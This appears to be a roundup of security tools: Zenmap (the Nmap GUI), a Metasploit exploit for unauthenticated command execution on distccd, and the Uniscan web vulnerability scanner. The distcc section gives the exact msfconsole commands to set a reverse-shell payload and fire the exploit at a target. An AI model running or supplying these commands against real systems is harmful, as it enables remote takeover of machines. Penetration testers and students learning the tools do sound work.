Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform (Linux, Windows, Mac OS X, BSD, etc.) free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scan results can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database.
You can download Zenmap (often packaged with Nmap itself) from the Nmap download page. Zenmap is quite intuitive, but you can learn more about using it from the Zenmap User's Guide or check out the Zenmap man page for some quick reference information.
This Metasploit exploit uses a documented security weakness to execute arbitrary commands on any system running distccd.
distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks. Exploit RanK - Excellent Cvss Score - 9.3
Commands :
msfconsole
msf > use exploit/unix/misc/distcc_exec msf exploit(distcc_exec) > show payloads msf exploit(distcc_exec) > set PAYLOAD generic/shell_reverse_tcp msf exploit(distcc_exec) > set LHOST [MY IP ADDRESS] msf exploit(distcc_exec) > set RHOST [TARGET IP] msf exploit(distcc_exec) > exploit
The Uniscan is a vulnerability scanner for Web applications, written in perl for Linux environment. It was developed as conclusion work of the computer science course of Federal University of Pampa and is licensed under the GNU GENERAL PUBLIC LICENSE 3.0 (GPL 3).
Features Of Uniscan:
Identification of system pages through a Web Crawler.
Use of threads in the crawler.
Control the maximum number of requests the crawler.
Control of variation of system pages identified by Web Crawler.
